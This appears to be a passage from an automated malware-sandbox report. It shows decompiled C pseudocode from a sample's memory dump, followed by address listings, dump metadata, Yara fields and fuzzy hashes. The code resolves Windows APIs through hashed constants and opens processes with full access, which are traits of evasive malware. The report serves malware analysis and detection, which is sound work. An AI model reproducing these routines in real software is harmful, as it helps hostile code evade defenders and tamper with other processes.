                                                                                                                                                									__eflags = _t315 - 0x3f;
                                                                                                                                                									if(_t315 <= 0x3f) {
                                                                                                                                                										__eflags = _t315 << 2;
                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 8)) + 0x2c)) =  *((intOrPtr*)(E1000F4E0( *(_t449 + 4), _t315 << 2)));
                                                                                                                                                										_t188 = E1000F4E0( *(_t449 + 0x7c), _t315 << 2);
                                                                                                                                                										_t413 =  *(_t449 + 4);
                                                                                                                                                										 *((intOrPtr*)(_t413 + 0x30)) =  *_t188;
                                                                                                                                                										_t317 =  *((intOrPtr*)(_t413 + 0x2c));
                                                                                                                                                										E1000B608(_t449 + 0x34);
                                                                                                                                                										E1000B608(_t449 + 8);
                                                                                                                                                										goto L62;
                                                                                                                                                									}
                                                                                                                                                									goto L59;
                                                                                                                                                								}
                                                                                                                                                								_t446 = 0;
                                                                                                                                                								__eflags = 0;
                                                                                                                                                								while(1) {
                                                                                                                                                									E1000CAD0(_t449 + 0x4c);
                                                                                                                                                									_t413 = 0;
                                                                                                                                                									_t343 = _t449 + 0x4c;
                                                                                                                                                									 *((char*)(_t343 + 4)) = 0;
                                                                                                                                                									 *((intOrPtr*)(_t343 + 0x20)) = 0;
                                                                                                                                                									__eflags = E1000C2C4(_t343);
                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 4);
                                                                                                                                                									 *((intOrPtr*)(E1000F4E0(_t449 + 0x14, E1000F4F0(_t449 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t449 + 0x4c));
                                                                                                                                                									 *((intOrPtr*)(_t449 + 0xc)) =  *((intOrPtr*)(_t449 + 0xc)) + 1;
                                                                                                                                                									_t202 = E1001303C(0xfe338407, 0xa8c8a645);
                                                                                                                                                									__eflags = _t202;
                                                                                                                                                									if(_t202 == 0) {
                                                                                                                                                										L51:
                                                                                                                                                										_t413 =  *(_t449 + 0x6c);
                                                                                                                                                										__eflags = _t413;
                                                                                                                                                										if(__eflags == 0) {
                                                                                                                                                											break;
                                                                                                                                                										}
                                                                                                                                                										__eflags = _t413 - 0xffffffff;
                                                                                                                                                										if(__eflags != 0) {
                                                                                                                                                											E1000F84C(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 4);
                                                                                                                                                											 *(E1000F4E0(_t449 + 0x40, E1000F4F0(_t449 + 0x3c) + 0xfffffffc)) =  *(_t449 + 0x6c);
                                                                                                                                                											 *((intOrPtr*)(_t449 + 0x4c - 0x14)) =  *((intOrPtr*)(_t449 + 0x4c - 0x14)) + 1;
                                                                                                                                                											E1000CD68(_t449 + 0x4c, __eflags);
                                                                                                                                                											_t446 = _t446 + 1;
                                                                                                                                                											__eflags = _t446 -  *(_t449 + 0x80);
                                                                                                                                                											if(_t446 <  *(_t449 + 0x80)) {
                                                                                                                                                												continue;
                                                                                                                                                											}
                                                                                                                                                											_t431 = 0;
                                                                                                                                                											__eflags = 0;
                                                                                                                                                											do {
                                                                                                                                                												_t211 = E1000F4E0( *(_t449 + 4), _t431 * 4);
                                                                                                                                                												_t212 = E1000F4E0(_t449 + 0x40, _t431 * 4);
                                                                                                                                                												E10008B9C( *_t211, E100102D4(0xfe338407, 0x1a9c1df5),  *_t212, 0, 0);
                                                                                                                                                												_t431 = _t431 + 1;
                                                                                                                                                												__eflags = _t431 -  *(_t449 + 0x80);
                                                                                                                                                											} while (_t431 <  *(_t449 + 0x80));
                                                                                                                                                											goto L57;
                                                                                                                                                										}
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									_t413 = 0;
                                                                                                                                                									_push(2);
                                                                                                                                                									_push(0);
                                                                                                                                                									_push(0);
                                                                                                                                                									_push(_t449 + 0x6c);
                                                                                                                                                									_push( *((intOrPtr*)(_t449 + 0x78)));
                                                                                                                                                									_push( *((intOrPtr*)(_t449 + 0x60)));
                                                                                                                                                									_push(0xffffffff);
                                                                                                                                                									asm("int3");
                                                                                                                                                									asm("int3");
                                                                                                                                                									__eflags = _t202;
                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                										break;
                                                                                                                                                									}
                                                                                                                                                									goto L51;
                                                                                                                                                								}
                                                                                                                                                								E1000CD68(_t449 + 0x4c, __eflags);
                                                                                                                                                								goto L59;
                                                                                                                                                							}
                                                                                                                                                							_t427 =  *_t173;
                                                                                                                                                							__eflags = _t427;
                                                                                                                                                							if(_t427 <= 0) {
                                                                                                                                                								goto L46;
                                                                                                                                                							}
                                                                                                                                                							_t430 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							_t322 =  &(_t173[1]);
                                                                                                                                                							while(1) {
                                                                                                                                                								_t433 = _t430 * 4;
                                                                                                                                                								_t217 = E1000F4E0(_t322, _t433);
                                                                                                                                                								_t218 =  *(_t449 + 4);
                                                                                                                                                								__eflags =  *_t217 - _t218[0xc];
                                                                                                                                                								if( *_t217 == _t218[0xc]) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_t430 = _t430 + 1;
                                                                                                                                                								__eflags = _t430 - _t427;
                                                                                                                                                								if(_t430 < _t427) {
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								goto L46;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t430 - 0xffffffff;
                                                                                                                                                							if(_t430 != 0xffffffff) {
                                                                                                                                                								_t219 = E1000F4F0( *_t449);
                                                                                                                                                								__eflags = _t219 - _t433;
                                                                                                                                                								if(_t219 > _t433) {
                                                                                                                                                									 *((intOrPtr*)(_t449 + 0x74)) = 4 + _t430 * 4;
                                                                                                                                                									_t247 = E1000F4F0( *_t449);
                                                                                                                                                									__eflags = _t247 -  *((intOrPtr*)(_t449 + 0x74));
                                                                                                                                                									if(_t247 >  *((intOrPtr*)(_t449 + 0x74))) {
                                                                                                                                                										 *((intOrPtr*)(_t449 + 0x90)) = E1000F4E0( *(_t449 + 4), _t433);
                                                                                                                                                										 *((intOrPtr*)(_t449 + 0x8c)) = E1000F4E0( *(_t449 + 4),  *((intOrPtr*)(_t449 + 0x74)));
                                                                                                                                                										E100138C8( *((intOrPtr*)(_t449 + 0x98)),  *((intOrPtr*)(_t449 + 0x90)), E1000F4F0( *_t449) -  *((intOrPtr*)(_t449 + 0x74)));
                                                                                                                                                										_t449 = _t449 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
                                                                                                                                                									_t421 =  *(_t449 + 4);
                                                                                                                                                									_t75 =  &(_t421[6]);
                                                                                                                                                									 *_t75 = _t421[6] - 1;
                                                                                                                                                									__eflags =  *_t75;
                                                                                                                                                								}
                                                                                                                                                								_t220 = E1000F4F0(_t322);
                                                                                                                                                								__eflags = _t220 - _t433;
                                                                                                                                                								if(_t220 > _t433) {
                                                                                                                                                									_t430 = 4 + _t430 * 4;
                                                                                                                                                									_t237 = E1000F4F0(_t322);
                                                                                                                                                									__eflags = _t237 - _t430;
                                                                                                                                                									if(_t237 > _t430) {
                                                                                                                                                										_t238 = E1000F4E0(_t322, _t433);
                                                                                                                                                										 *((intOrPtr*)(_t449 + 0x94)) = E1000F4E0(_t322, _t430);
                                                                                                                                                										E100138C8(_t238,  *((intOrPtr*)(_t449 + 0x98)), E1000F4F0(_t322) - _t430);
                                                                                                                                                										_t449 = _t449 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C(_t322, E1000F4F0(_t322) + 0xfffffffc);
                                                                                                                                                									_t246 =  *(_t449 + 4);
                                                                                                                                                									 *_t246 =  *_t246 - 1;
                                                                                                                                                									__eflags =  *_t246;
                                                                                                                                                								}
                                                                                                                                                								E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
                                                                                                                                                								 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = ( *(_t449 + 4))[0xb];
                                                                                                                                                								( *(_t449 + 4))[6] = ( *(_t449 + 4))[6] + 1;
                                                                                                                                                								E1000F84C(_t322, E1000F4F0(_t322) + 4);
                                                                                                                                                								 *(E1000F4E0(_t322, E1000F4F0(_t322) + 0xfffffffc)) = ( *(_t449 + 4))[0xc];
                                                                                                                                                								 *( *(_t449 + 4)) =  *( *(_t449 + 4)) + 1;
                                                                                                                                                							}
                                                                                                                                                							goto L46;
                                                                                                                                                						}
                                                                                                                                                						_t323 = 0;
                                                                                                                                                						__eflags = 0;
                                                                                                                                                						do {
                                                                                                                                                							 *(_t449 + 0x7c) = _t323 * 4;
                                                                                                                                                							_t428 = E1000F4E0(_t449 + 0x28, _t323 * 4);
                                                                                                                                                							_t258 =  *(_t449 + 4);
                                                                                                                                                							_t430 =  *_t258;
                                                                                                                                                							__eflags = _t430;
                                                                                                                                                							if(_t430 <= 0) {
                                                                                                                                                								L29:
                                                                                                                                                								_t437 = E1001303C(0x10154545, 0xc2a75cb8);
                                                                                                                                                								__eflags = _t437;
                                                                                                                                                								if(_t437 != 0) {
                                                                                                                                                									_t439 =  *_t437(0x1fffff, 0,  *((intOrPtr*)(E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c)))));
                                                                                                                                                									__eflags = _t439;
                                                                                                                                                									if(_t439 != 0) {
                                                                                                                                                										E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 4);
                                                                                                                                                										 *(E1000F4E0( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc)) = _t439;
                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) =  *((intOrPtr*)( *((intOrPtr*)(_t449 + 0x28 - 0x20)) + 0x18)) + 1;
                                                                                                                                                										_t269 = E1000F4E0(_t449 + 0x28,  *(_t449 + 0x7c));
                                                                                                                                                										 *(_t449 + 0x70) =  &(( *(_t449 + 4))[1]);
                                                                                                                                                										E1000F84C( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( &(( *(_t449 + 4))[1])) + 4);
                                                                                                                                                										 *((intOrPtr*)(E1000F4E0( *((intOrPtr*)(_t449 + 0x74)), E1000F4F0( *(_t449 + 0x70)) + 0xfffffffc))) =  *_t269;
                                                                                                                                                										_t277 =  *(_t449 + 4);
                                                                                                                                                										 *_t277 =  *_t277 + 1;
                                                                                                                                                										__eflags =  *_t277;
                                                                                                                                                									}
                                                                                                                                                								}
                                                                                                                                                								goto L32;
                                                                                                                                                							}
                                                                                                                                                							_t438 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							 *(_t449 + 0x88) =  &(_t258[1]);
                                                                                                                                                							while(1) {
                                                                                                                                                								_t279 = E1000F4E0( *((intOrPtr*)(_t449 + 0x8c)), _t438 * 4);
                                                                                                                                                								__eflags =  *_t279 -  *_t428;
                                                                                                                                                								if( *_t279 ==  *_t428) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_t438 = _t438 + 1;
                                                                                                                                                								__eflags = _t438 - _t430;
                                                                                                                                                								if(_t438 < _t430) {
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								goto L29;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t438 - 0xffffffff;
                                                                                                                                                							if(_t438 == 0xffffffff) {
                                                                                                                                                								goto L29;
                                                                                                                                                							}
                                                                                                                                                							L32:
                                                                                                                                                							_t323 = _t323 + 1;
                                                                                                                                                							__eflags = _t323 -  *(_t449 + 0x20);
                                                                                                                                                						} while (_t323 <  *(_t449 + 0x20));
                                                                                                                                                						goto L33;
                                                                                                                                                					} else {
                                                                                                                                                						_t324 = 0;
                                                                                                                                                						__eflags = 0;
                                                                                                                                                						do {
                                                                                                                                                							 *(_t449 + 0x64) = _t324 * 4;
                                                                                                                                                							_t429 = E1000F4E0( *(_t449 + 0x7c), _t324 * 4);
                                                                                                                                                							_t430 =  *(_t449 + 0x20);
                                                                                                                                                							__eflags = _t430;
                                                                                                                                                							if(_t430 <= 0) {
                                                                                                                                                								L11:
                                                                                                                                                								_t430 =  &(( *(_t449 + 4))[1]);
                                                                                                                                                								_t283 = E1000F4F0( &(( *(_t449 + 4))[1]));
                                                                                                                                                								__eflags = _t283 -  *(_t449 + 0x64);
                                                                                                                                                								if(_t283 >  *(_t449 + 0x64)) {
                                                                                                                                                									_t443 = 4 + _t324 * 4;
                                                                                                                                                									_t299 = E1000F4F0(_t430);
                                                                                                                                                									__eflags = _t299 - _t443;
                                                                                                                                                									if(_t299 > _t443) {
                                                                                                                                                										 *((intOrPtr*)(_t449 + 0x9c)) = E1000F4E0(_t430,  *(_t449 + 0x64));
                                                                                                                                                										 *((intOrPtr*)(_t449 + 0x98)) = E1000F4E0(_t430, _t443);
                                                                                                                                                										E100138C8( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E1000F4F0(_t430) - _t443);
                                                                                                                                                										_t449 = _t449 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C(_t430, E1000F4F0(_t430) + 0xfffffffc);
                                                                                                                                                									_t308 =  *(_t449 + 4);
                                                                                                                                                									 *_t308 =  *_t308 - 1;
                                                                                                                                                									__eflags =  *_t308;
                                                                                                                                                								}
                                                                                                                                                								_t442 = E1001303C(0xfe338407, 0x77fa1d17);
                                                                                                                                                								__eflags = _t442;
                                                                                                                                                								if(_t442 != 0) {
                                                                                                                                                									 *_t442( *(E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64))));
                                                                                                                                                								}
                                                                                                                                                								_t285 = E1000F4F0( *_t449);
                                                                                                                                                								__eflags = _t285 -  *(_t449 + 0x64);
                                                                                                                                                								if(_t285 >  *(_t449 + 0x64)) {
                                                                                                                                                									_t445 = 4 + _t324 * 4;
                                                                                                                                                									_t287 = E1000F4F0( *_t449);
                                                                                                                                                									__eflags = _t287 - _t445;
                                                                                                                                                									if(_t287 > _t445) {
                                                                                                                                                										_t430 = E1000F4E0( *(_t449 + 4),  *(_t449 + 0x64));
                                                                                                                                                										 *((intOrPtr*)(_t449 + 0xa0)) = E1000F4E0( *(_t449 + 4), _t445);
                                                                                                                                                										E100138C8(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E1000F4F0( *_t449) - _t445);
                                                                                                                                                										_t449 = _t449 + 0xc;
                                                                                                                                                									}
                                                                                                                                                									E1000F84C( *(_t449 + 4), E1000F4F0( *_t449) + 0xfffffffc);
                                                                                                                                                									_t296 =  *(_t449 + 4);
                                                                                                                                                									_t33 =  &(_t296[6]);
                                                                                                                                                									 *_t33 = _t296[6] - 1;
                                                                                                                                                									__eflags =  *_t33;
                                                                                                                                                								}
                                                                                                                                                								_t324 = _t324 - 1;
                                                                                                                                                								__eflags = _t324;
                                                                                                                                                								goto L20;
                                                                                                                                                							}
                                                                                                                                                							_t444 = 0;
                                                                                                                                                							__eflags = 0;
                                                                                                                                                							while(1) {
                                                                                                                                                								_t310 = E1000F4E0(_t449 + 0x28, _t444 * 4);
                                                                                                                                                								__eflags =  *_t310 -  *_t429;
                                                                                                                                                								if( *_t310 ==  *_t429) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_t444 = _t444 + 1;
                                                                                                                                                								__eflags = _t444 - _t430;
                                                                                                                                                								if(_t444 < _t430) {
                                                                                                                                                									continue;
                                                                                                                                                								}
                                                                                                                                                								goto L11;
                                                                                                                                                							}
                                                                                                                                                							__eflags = _t444 - 0xffffffff;
                                                                                                                                                							if(_t444 == 0xffffffff) {
                                                                                                                                                								goto L11;
                                                                                                                                                							}
                                                                                                                                                							L20:
                                                                                                                                                							_t324 = _t324 + 1;
                                                                                                                                                							__eflags = _t324 -  *( *(_t449 + 4));
                                                                                                                                                						} while (_t324 <  *( *(_t449 + 4)));
                                                                                                                                                						goto L21;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                			}























































                                                                                                                                                0x10008479
                                                                                                                                                0x1000847f
                                                                                                                                                0x10008483
                                                                                                                                                0x10008487
                                                                                                                                                0x10008492
                                                                                                                                                0x10008496
                                                                                                                                                0x1000849b
                                                                                                                                                0x100084a3
                                                                                                                                                0x100084b3
                                                                                                                                                0x00000000
                                                                                                                                                0x100084b5
                                                                                                                                                0x100084bd
                                                                                                                                                0x100084c4
                                                                                                                                                0x100084c4
                                                                                                                                                0x10008a17
                                                                                                                                                0x10008a19
                                                                                                                                                0x10008a5a
                                                                                                                                                0x10008a5c
                                                                                                                                                0x10008a6b
                                                                                                                                                0x10008a77
                                                                                                                                                0x10008a77
                                                                                                                                                0x10008a66
                                                                                                                                                0x10008a7d
                                                                                                                                                0x10008a82
                                                                                                                                                0x00000000
                                                                                                                                                0x10008a82
                                                                                                                                                0x10008a6a
                                                                                                                                                0x00000000
                                                                                                                                                0x100084ce
                                                                                                                                                0x100084d2
                                                                                                                                                0x100084d5
                                                                                                                                                0x100085dd
                                                                                                                                                0x100085dd
                                                                                                                                                0x100085e2
                                                                                                                                                0x10008705
                                                                                                                                                0x10008709
                                                                                                                                                0x1000870e
                                                                                                                                                0x10008712
                                                                                                                                                0x10008716
                                                                                                                                                0x1000884c
                                                                                                                                                0x1000884e
                                                                                                                                                0x10008852
                                                                                                                                                0x1000885b
                                                                                                                                                0x10008866
                                                                                                                                                0x1000886a
                                                                                                                                                0x10008873
                                                                                                                                                0x10008878
                                                                                                                                                0x1000887e
                                                                                                                                                0x1000887f
                                                                                                                                                0x10008883
                                                                                                                                                0x10008887
                                                                                                                                                0x1000888e
                                                                                                                                                0x10008890
                                                                                                                                                0x100089d0
                                                                                                                                                0x100089e1
                                                                                                                                                0x100089e8
                                                                                                                                                0x100089ef
                                                                                                                                                0x100089ef
                                                                                                                                                0x100089f2
                                                                                                                                                0x100089f5
                                                                                                                                                0x100089f8
                                                                                                                                                0x100089fe
                                                                                                                                                0x10008a05
                                                                                                                                                0x10008a09
                                                                                                                                                0x10008a12
                                                                                                                                                0x00000000
                                                                                                                                                0x10008a12
                                                                                                                                                0x10008a00
                                                                                                                                                0x10008a03
                                                                                                                                                0x10008a1c
                                                                                                                                                0x10008a34
                                                                                                                                                0x10008a37
                                                                                                                                                0x10008a3c
                                                                                                                                                0x10008a46
                                                                                                                                                0x10008a49
                                                                                                                                                0x10008a4c
                                                                                                                                                0x10008a55
                                                                                                                                                0x00000000
                                                                                                                                                0x10008a55
                                                                                                                                                0x00000000
                                                                                                                                                0x10008a03
                                                                                                                                                0x10008898
                                                                                                                                                0x10008898
                                                                                                                                                0x1000889a
                                                                                                                                                0x1000889e
                                                                                                                                                0x100088a3
                                                                                                                                                0x100088a5
                                                                                                                                                0x100088a9
                                                                                                                                                0x100088ac
                                                                                                                                                0x100088b4
                                                                                                                                                0x100088b6
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100088cd
                                                                                                                                                0x100088e8
                                                                                                                                                0x100088ea
                                                                                                                                                0x100088f8
                                                                                                                                                0x100088fd
                                                                                                                                                0x100088ff
                                                                                                                                                0x1000891c
                                                                                                                                                0x1000891c
                                                                                                                                                0x10008920
                                                                                                                                                0x10008922
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10008924
                                                                                                                                                0x10008927
                                                                                                                                                0x10008948
                                                                                                                                                0x10008967
                                                                                                                                                0x1000896d
                                                                                                                                                0x10008970
                                                                                                                                                0x10008975
                                                                                                                                                0x10008976
                                                                                                                                                0x1000897d
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10008985
                                                                                                                                                0x10008985
                                                                                                                                                0x10008987
                                                                                                                                                0x10008993
                                                                                                                                                0x1000899f
                                                                                                                                                0x100089c1
                                                                                                                                                0x100089c6
                                                                                                                                                0x100089c7
                                                                                                                                                0x100089c7
                                                                                                                                                0x00000000
                                                                                                                                                0x10008987
                                                                                                                                                0x00000000
                                                                                                                                                0x10008927
                                                                                                                                                0x10008901
                                                                                                                                                0x10008907
                                                                                                                                                0x10008909
                                                                                                                                                0x1000890a
                                                                                                                                                0x1000890b
                                                                                                                                                0x1000890c
                                                                                                                                                0x10008910
                                                                                                                                                0x10008914
                                                                                                                                                0x10008916
                                                                                                                                                0x10008917
                                                                                                                                                0x10008918
                                                                                                                                                0x1000891a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000891a
                                                                                                                                                0x1000892d
                                                                                                                                                0x00000000
                                                                                                                                                0x1000892d
                                                                                                                                                0x1000871c
                                                                                                                                                0x1000871e
                                                                                                                                                0x10008720
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000872a
                                                                                                                                                0x1000872a
                                                                                                                                                0x1000872c
                                                                                                                                                0x1000872f
                                                                                                                                                0x10008731
                                                                                                                                                0x10008739
                                                                                                                                                0x10008740
                                                                                                                                                0x10008744
                                                                                                                                                0x10008747
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10008843
                                                                                                                                                0x10008844
                                                                                                                                                0x10008846
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10008846
                                                                                                                                                0x1000874d
                                                                                                                                                0x10008750
                                                                                                                                                0x10008759
                                                                                                                                                0x1000875e
                                                                                                                                                0x10008760
                                                                                                                                                0x1000876c
                                                                                                                                                0x10008770
                                                                                                                                                0x10008775
                                                                                                                                                0x10008779
                                                                                                                                                0x10008b56
                                                                                                                                                0x10008b6a
                                                                                                                                                0x10008b8c
                                                                                                                                                0x10008b91
                                                                                                                                                0x10008b91
                                                                                                                                                0x1000878f
                                                                                                                                                0x10008794
                                                                                                                                                0x10008798
                                                                                                                                                0x10008798
                                                                                                                                                0x10008798
                                                                                                                                                0x10008798
                                                                                                                                                0x1000879d
                                                                                                                                                0x100087a2
                                                                                                                                                0x100087a4
                                                                                                                                                0x100087a8
                                                                                                                                                0x100087af
                                                                                                                                                0x100087b4
                                                                                                                                                0x100087b6
                                                                                                                                                0x10008b17
                                                                                                                                                0x10008b26
                                                                                                                                                0x10008b3f
                                                                                                                                                0x10008b44
                                                                                                                                                0x10008b44
                                                                                                                                                0x100087c9
                                                                                                                                                0x100087ce
                                                                                                                                                0x100087d2
                                                                                                                                                0x100087d2
                                                                                                                                                0x100087d2
                                                                                                                                                0x100087e4
                                                                                                                                                0x10008805
                                                                                                                                                0x1000880d
                                                                                                                                                0x1000881b
                                                                                                                                                0x10008839
                                                                                                                                                0x1000883f
                                                                                                                                                0x1000883f
                                                                                                                                                0x00000000
                                                                                                                                                0x10008750
                                                                                                                                                0x100085e8
                                                                                                                                                0x100085e8
                                                                                                                                                0x100085ea
                                                                                                                                                0x100085f1
                                                                                                                                                0x100085ff
                                                                                                                                                0x10008601
                                                                                                                                                0x10008605
                                                                                                                                                0x10008607
                                                                                                                                                0x10008609
                                                                                                                                                0x10008644
                                                                                                                                                0x10008653
                                                                                                                                                0x10008655
                                                                                                                                                0x10008657
                                                                                                                                                0x10008675
                                                                                                                                                0x10008677
                                                                                                                                                0x10008679
                                                                                                                                                0x1000868b
                                                                                                                                                0x100086a9
                                                                                                                                                0x100086b2
                                                                                                                                                0x100086b5
                                                                                                                                                0x100086c3
                                                                                                                                                0x100086d4
                                                                                                                                                0x100086f2
                                                                                                                                                0x100086f4
                                                                                                                                                0x100086f8
                                                                                                                                                0x100086f8
                                                                                                                                                0x100086f8
                                                                                                                                                0x10008679
                                                                                                                                                0x00000000
                                                                                                                                                0x10008657
                                                                                                                                                0x1000860f
                                                                                                                                                0x1000860f
                                                                                                                                                0x10008614
                                                                                                                                                0x1000861b
                                                                                                                                                0x1000862a
                                                                                                                                                0x10008631
                                                                                                                                                0x10008633
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x1000863f
                                                                                                                                                0x10008640
                                                                                                                                                0x10008642
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10008642
                                                                                                                                                0x10008635
                                                                                                                                                0x10008638
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100086fa
                                                                                                                                                0x100086fa
                                                                                                                                                0x100086fb
                                                                                                                                                0x100086fb
                                                                                                                                                0x00000000
                                                                                                                                                0x100084db
                                                                                                                                                0x100084db
                                                                                                                                                0x100084db
                                                                                                                                                0x100084dd
                                                                                                                                                0x100084e4
                                                                                                                                                0x100084f2
                                                                                                                                                0x100084f4
                                                                                                                                                0x100084f8
                                                                                                                                                0x100084fa
                                                                                                                                                0x10008526
                                                                                                                                                0x1000852a
                                                                                                                                                0x1000852f
                                                                                                                                                0x10008534
                                                                                                                                                0x10008538
                                                                                                                                                0x1000853c
                                                                                                                                                0x10008543
                                                                                                                                                0x10008548
                                                                                                                                                0x1000854a
                                                                                                                                                0x10008ad9
                                                                                                                                                0x10008ae8
                                                                                                                                                0x10008b07
                                                                                                                                                0x10008b0c
                                                                                                                                                0x10008b0c
                                                                                                                                                0x1000855d
                                                                                                                                                0x10008562
                                                                                                                                                0x10008566
                                                                                                                                                0x10008566
                                                                                                                                                0x10008566
                                                                                                                                                0x10008577
                                                                                                                                                0x10008579
                                                                                                                                                0x1000857b
                                                                                                                                                0x1000858c
                                                                                                                                                0x1000858c
                                                                                                                                                0x10008591
                                                                                                                                                0x10008596
                                                                                                                                                0x1000859a
                                                                                                                                                0x1000859f
                                                                                                                                                0x100085a6
                                                                                                                                                0x100085ab
                                                                                                                                                0x100085ad
                                                                                                                                                0x10008a9b
                                                                                                                                                0x10008aa7
                                                                                                                                                0x10008ac1
                                                                                                                                                0x10008ac6
                                                                                                                                                0x10008ac6
                                                                                                                                                0x100085c3
                                                                                                                                                0x100085c8
                                                                                                                                                0x100085cc
                                                                                                                                                0x100085cc
                                                                                                                                                0x100085cc
                                                                                                                                                0x100085cc
                                                                                                                                                0x100085cf
                                                                                                                                                0x100085cf
                                                                                                                                                0x00000000
                                                                                                                                                0x100085cf
                                                                                                                                                0x100084fe
                                                                                                                                                0x100084fe
                                                                                                                                                0x10008500
                                                                                                                                                0x1000850c
                                                                                                                                                0x10008513
                                                                                                                                                0x10008515
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10008521
                                                                                                                                                0x10008522
                                                                                                                                                0x10008524
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x10008524
                                                                                                                                                0x10008517
                                                                                                                                                0x1000851a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x100085d0
                                                                                                                                                0x100085d4
                                                                                                                                                0x100085d5
                                                                                                                                                0x100085d5
                                                                                                                                                0x00000000
                                                                                                                                                0x100084dd
                                                                                                                                                0x100084d5

                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000003.00000002.319669645.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                • Associated: 00000003.00000002.319665498.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319682425.000000001001A000.00000002.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319687174.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                • Associated: 00000003.00000002.319691145.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 0-3916222277
                                                                                                                                                • Opcode ID: e5d2a05c997b5056918904a7564b335668fb5dad0c144e9a8d9b79fdba869408
                                                                                                                                                • Instruction ID: 1bb0d61435caef0e58cc5acfc0dead8aa63cbeb4aacce1040875febecc2d3119
                                                                                                                                                • Opcode Fuzzy Hash: e5d2a05c997b5056918904a7564b335668fb5dad0c144e9a8d9b79fdba869408
                                                                                                                                                • Instruction Fuzzy Hash: 76126C752083049FE714DF24C981A6FB7E5FF85784F10892DF999872AAEB30AD04DB42
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                			E10019348(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                                                				signed int _t250;
                                                                                                                                                				signed char _t251;
                                                                                                                                                				signed char* _t254;
                                                                                                                                                				char _t255;
                                                                                                                                                				signed short _t256;
                                                                                                                                                				char _t257;
                                                                                                                                                				signed short _t260;
                                                                                                                                                				signed int _t261;
                                                                                                                                                				signed int _t262;
                                                                                                                                                				void* _t264;
                                                                                                                                                				void* _t272;
                                                                                                                                                				void* _t273;
                                                                                                                                                				signed short* _t274;
                                                                                                                                                				signed char _t275;
                                                                                                                                                				signed int _t277;
                                                                                                                                                				signed int _t278;
                                                                                                                                                				void* _t282;
                                                                                                                                                				signed int _t288;
                                                                                                                                                				unsigned int _t290;
                                                                                                                                                				signed int _t292;
                                                                                                                                                				signed int _t293;
                                                                                                                                                				signed int _t294;
                                                                                                                                                				signed int _t295;
                                                                                                                                                				unsigned int _t296;
                                                                                                                                                				unsigned int _t297;
                                                                                                                                                				signed int _t299;
                                                                                                                                                				unsigned int _t301;
                                                                                                                                                				signed char _t302;
                                                                                                                                                				signed int _t304;
                                                                                                                                                				signed char _t307;
                                                                                                                                                				signed char _t308;
                                                                                                                                                				signed int _t309;
                                                                                                                                                				void* _t312;
                                                                                                                                                				void* _t313;
                                                                                                                                                				signed int _t314;
                                                                                                                                                				signed int _t316;
                                                                                                                                                				signed int _t319;
                                                                                                                                                				signed int _t321;
                                                                                                                                                				signed int _t338;
                                                                                                                                                				signed int _t339;
